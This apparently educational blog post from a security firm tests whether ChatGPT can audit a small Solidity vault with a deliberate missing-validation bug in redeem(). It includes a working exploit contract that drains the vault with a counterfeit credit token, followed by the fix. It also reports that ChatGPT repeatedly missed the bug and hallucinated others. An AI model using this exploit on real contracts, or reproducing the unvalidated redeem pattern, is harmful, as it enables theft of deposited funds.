Luna Tong

Can ChatGPT Audit Smart Contracts?

ChatGPT fails to find simple, but critical smart contract bugs

The answer is No.

GPT-4 is certainly amazing, and we’ve seen notable tweets [1] [2] demonstrating examples of ChatGPT identifying smart contract vulnerabilities.

The thing is, speaking as the author of one of the tweets linked above, these examples are cherry-picked. Even OpenAI’s latest model, GPT-4, is unable to reliably detect surface-level critical bugs.

Let’s begin with a simple example contract that has a deadly vulnerability lurking within it.

Example Contract

pragma solidity 0.8.15;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
// NOTE: assumes the wighawag/clones-with-immutable-args library is available under this remapping
import {ClonesWithImmutableArgs} from "clones-with-immutable-args/ClonesWithImmutableArgs.sol";
import {ERC20CreditToken} from "./ERC20CreditToken.sol";

/// Tokenizing Vault Contract
///
/// This is a simple vault contract that accepts ERC20 deposits and issues
/// credit (accounting) tokens. The accounting tokens can then be redeemed
/// to withdraw a deposit.
contract TokenizingVault is ReentrancyGuard {
    using ClonesWithImmutableArgs for address;

    /// ERC20 accounting tokens (unique per underlying)
    mapping(ERC20 => ERC20CreditToken) public creditTokens;

    /// ERC20CreditToken reference implementation
    ERC20CreditToken public immutable creditTokenImpl;

    constructor() {
        creditTokenImpl = new ERC20CreditToken();
    }

    function create(ERC20 underlying, uint256 amount)
        external nonReentrant returns (ERC20CreditToken, uint256)
    {
        ERC20CreditToken creditToken = creditTokens[underlying];

        // Revert if no token exists, must call deploy first
        if (address(creditToken) == address(0))
            revert('Token Does Not Exist');

        // Transfer in underlying
        underlying.transferFrom(msg.sender, address(this), amount);

        // Mint new credit tokens
        creditToken.mint(msg.sender, amount);

        return (creditToken, amount);
    }

    function redeem(ERC20CreditToken token, uint256 amount)
        external nonReentrant
    {
        token.burn(msg.sender, amount);
        token.underlying().transfer(msg.sender, amount);
    }

    function deploy(ERC20 underlying)
        external nonReentrant returns (ERC20CreditToken)
    {
        // Create credit token if one doesn't already exist
        ERC20CreditToken creditToken = creditTokens[underlying];
        if (address(creditToken) == address(0)) {
            bytes memory tokenData = abi.encodePacked(underlying, address(this));
            creditToken = ERC20CreditToken(address(creditTokenImpl).clone(tokenData));
            creditTokens[underlying] = creditToken;
        }
        return creditToken;
    }
}

This is a simple vault contract. It accepts user deposits of arbitrary ERC20s and issues matching “credit” (i.e., deposit) tokens. These deposit tokens can then be redeemed for the original deposit. Deposit tokens are handy because they allow users to trade their deposits fungibly. You could imagine this vault supporting other features like yield farming, but this example is cut to an absolute minimum to make it as simple as possible to audit.
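To make the intended flow concrete, here is a minimal usage sketch. The ExampleDepositor contract and the dai parameter are hypothetical, not part of the vault’s codebase, and the sketch assumes the depositor already holds the underlying tokens:

pragma solidity 0.8.15;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {ERC20CreditToken} from "./ERC20CreditToken.sol";
import {TokenizingVault} from "./TokenizingVault.sol";

/// Walks through the intended deposit/redeem flow for a single user.
/// (Illustrative only; assumes this contract already holds at least 100 `dai`.)
contract ExampleDepositor {
    function depositAndWithdraw(TokenizingVault vault, ERC20 dai) external {
        // 1. Make sure a credit token exists for this underlying.
        ERC20CreditToken cDai = vault.deploy(dai);

        // 2. Deposit 100 tokens and receive 100 credit tokens in return.
        dai.approve(address(vault), 100e18);
        vault.create(dai, 100e18);

        // 3. Burn the credit tokens to withdraw the original deposit.
        vault.redeem(cDai, 100e18);
    }
}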

Can you spot the bug?

That’s right, it’s in the redeem function. This is an external function with no access control and no input validation. Let’s see why this function is vulnerable.

While it is true that a user would not be able to withdraw funds if they lack sufficient credit tokens (token.burn would revert), this is not sufficient protection. The core issue is that the function never validates that the passed token is authentic, i.e., issued by the vault contract and not counterfeit. You could exploit this contract by calling redeem() with a fake, attacker-deployed ERC20CreditToken whose underlying() is a real, valuable ERC20 that other users have deposited into the vault.
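To make this concrete, here is a hedged sketch of what such an attack could look like. The FakeCreditToken and Exploit contracts are hypothetical, written only to illustrate the missing check; they are not code from any real incident:

pragma solidity 0.8.15;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {ERC20CreditToken} from "./ERC20CreditToken.sol";
import {TokenizingVault} from "./TokenizingVault.sol";

/// Counterfeit credit token: burn() is a no-op, and underlying() points at a
/// real, valuable asset already sitting in the vault.
contract FakeCreditToken {
    ERC20 public underlying;

    constructor(ERC20 realAsset) {
        underlying = realAsset;
    }

    /// The vault calls token.burn(msg.sender, amount); we simply do nothing.
    function burn(address, uint256) external {}
}

/// Drains the vault's entire balance of `valuableAsset` in a single call.
contract Exploit {
    function drain(TokenizingVault vault, ERC20 valuableAsset) external {
        FakeCreditToken fake = new FakeCreditToken(valuableAsset);

        // redeem() never checks that the token was issued by the vault, so it
        // happily "burns" our counterfeit and pays out real user deposits.
        vault.redeem(
            ERC20CreditToken(address(fake)),
            valuableAsset.balanceOf(address(vault))
        );

        // Forward the stolen funds to the caller.
        valuableAsset.transfer(msg.sender, valuableAsset.balanceOf(address(this)));
    }
}

Note that the attacker needs nothing more than the vault’s address and the address of a valuable underlying it holds; no deposit is required.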

To give an analogy, imagine that this vault is the U.S. Federal Reserve. In this banking system, people can deposit wire transfers to receive dollars. The corresponding exploit would be if the Federal Reserve allowed you to withdraw money using fake dollars that you forged.

Keep in mind this function is only two lines long, and it is a straightforward lack of input validation. It is not a deep, complex, or confusing logical bug or design flaw. It is a basic coding mistake.
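For comparison, here is a sketch of the single check that would close the hole: only honor credit tokens that the vault itself issued for their claimed underlying. This is illustrative, not a canonical fix:

function redeem(ERC20CreditToken token, uint256 amount)
    external nonReentrant
{
    // Only accept credit tokens that this vault deployed for the claimed underlying.
    if (address(creditTokens[token.underlying()]) != address(token))
        revert('Token Does Not Exist');

    token.burn(msg.sender, amount);
    token.underlying().transfer(msg.sender, amount);
}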

Can GPT find a simple input validation bug?

Now, let’s try to use ChatGPT to audit this smart contract. It is very small, so it fits into GPT-4’s enormous context window.

We’ll use this prompt:

Helpful as always, ChatGPT responds with “Ready”. Now let’s just paste in the contract source code. (Note: when I did this experiment, I had some extra comments in the code; in theory, the “audit” results ought to be the same.)

Here’s ChatGPT’s response:

Not only does ChatGPT miss the critical bug, it does so confidently. Ironically, it even points out missing input validation, yet the specific bug it claims to have found doesn’t really matter.

Okay. Maybe we just got unlucky. Let’s try running it again.

Funnily enough, it mentions the redeem function, but it unfortunately hallucinated a bug that, again, doesn’t really matter. It missed the much more serious issue that could drain the entire vault, despite zeroing in on the right function.

Okay. What if we try to pass in the code, one function at a time? And this time, we will even prompt it specifically to treat attacker-controlled inputs as potentially malicious.

Helpful as always. Now let’s just paste in the code one function at a time.

This goes on for a while, with ChatGPT asking for more code each time. On a different run, it analyzed the functions one at a time, essentially summarizing each one and pointing out a few facts about it.

This was the final output:

So once again, it missed the critical, but relatively surface-level bug. This should be sufficient to show that ChatGPT is certainly not up to the task of auditing smart contracts, especially for mission-critical, financial code.

Conclusion

With the advent of GPT-4, ChatGPT is an excellent assistant for many tasks. It is proficient at writing code snippets, answering general knowledge questions, and providing helpful advice and commentary. That being said, ChatGPT is prone to generating responses that “feel” right (i.e., pass a vibe check) but aren’t actually correct. Worryingly, despite OpenAI’s best efforts, it is still often confidently wrong.

We conducted a short series of experiments with a relatively surface-level, but critical, smart contract vulnerability in a small contract. ChatGPT failed to identify the vulnerability in every trial. This experiment was certainly limited by a small sample size (ChatGPT currently allows only 50 generations per 3 hours). However, for mission-critical code like smart contracts, a false negative rate of 10 out of 10 tries is unacceptable.

ChatGPT and LLM-based AI technology in general will likely become a useful aid in a security researcher’s arsenal of tools. However, LLMs in their current state are unlikely to make the job redundant. It seems that highly skilled, specialized jobs like smart contract auditing are likely to remain in demand for the foreseeable future.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

Contact us for an audit that’s better than the rest. Real audits, not rubber stamps.